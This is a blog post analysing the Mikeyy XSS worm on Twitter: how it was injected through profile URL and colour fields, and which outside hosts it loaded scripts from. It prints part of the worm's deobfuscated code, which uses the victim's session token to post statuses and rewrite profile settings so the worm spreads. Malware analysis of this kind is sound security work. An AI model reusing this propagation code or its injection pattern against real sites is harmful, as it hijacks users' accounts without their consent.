Learnt about the worm this morning and didn't take to long to find an infected profile just by searching.
The cause is a silly bug in handing form input posted to the server that allows code injection.
After a quick examination on the source, I found the injected code in the obvious place, where you get to enter a URL in the profile:
But after examining the source found that the vulnerability is not the only on the URL but also on the decoration.
Look at the twitter colour design section:
Seems harmless, right? however, when the user selects the the colours they are submitted, and if the input is not properly escaped and validated, then it can be injected:
The actual injected code has been identified already but we might be talking about a variation.
In other words, the vulnerability can not only be in places where users can enter text, but whenever data is posted to the server. this means that other fields might be vulnerable.
We all make coding mistakes, but where I think twitter FAILED was in not fixing it properly when StalkDaily came up.
UPDATE 1
The injected code tries to load the scripts from content.ireel.com/jsxss.js which is scrambled but so far it looks like what has already been posted the only thing it changes is the messages shown:
_0x4c9d[38] Twitter should really fix this... Mikeyy _0x4c9d[39] I am done... Mikeyy _0x4c9d[40] Mikeyy is done.. _0x4c9d[41] Twitter please fix this, regards Mikeyy
UPDATE 2
It also try to load a script from bambamyo.110mb.com/wompwomp.js
I also found that he is more creative in his script and encodes the script injection twice...
As suspected, the code is injected in the profile URL and in the background colour:
var _0xcd6ax1c = new XHConn();
_0xcd6ax1c.connect("/status/update", "POST", "authenticity_token=" +
token + "&status=" + _0xcd6ax18 + "&return_rendered_status=true&twttr=true");
var _0xcd6ax1d = new XHConn();
_0xcd6ax1d.connect("/account/settings", "POST", "authenticity_token=" +
token + "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
var _0xcd6ax1e = new XHConn();
_0xcd6ax1e.connect("/account/profile_settings", "POST", "authenticity_token=" +
token + "&user[profile_default]=false&tab=none" +
"&profile_theme=0&user[profile_use_background_image]=0" +
"&user[profile_background_tile]" +
"=0&user[profile_link_color]=" + _0xcd6ax1b
+ "&commit=save+changes");
var _0xcd6ax1f = new XHConn();
_0xcd6ax1f.connect("/account/settings", "POST", "authenticity_token=" + token +
"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
var _0xcd6ax20 = new XHConn();
_0xcd6ax20.connect("/account/profile_settings", "POST", "authenticity_token=" +
token + "&user[profile_default]=false&tab=none&profile_theme=" +
"0&user[profile_use_background_image]=0&user[profile_background_tile]" +
"=0&user[profile_link_color]=" + _0xcd6ax1b + "&commit=save+changes");
var _0xcd6ax21 = new XHConn();
_0xcd6ax21.connect("/account/settings", "POST", "authenticity_token=" + token +
"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
As per above, it replaces the user's name with "Womp" + spaces.
UPDATE 3: The risks
So far the script does not cause major harm, but it could cause more damage such as posting the email address (which is confidential) or 'forgetting' the password.
There is not risk of getting the password changed as twitter requires to enter the current password, which is not available to the script.
Add Comment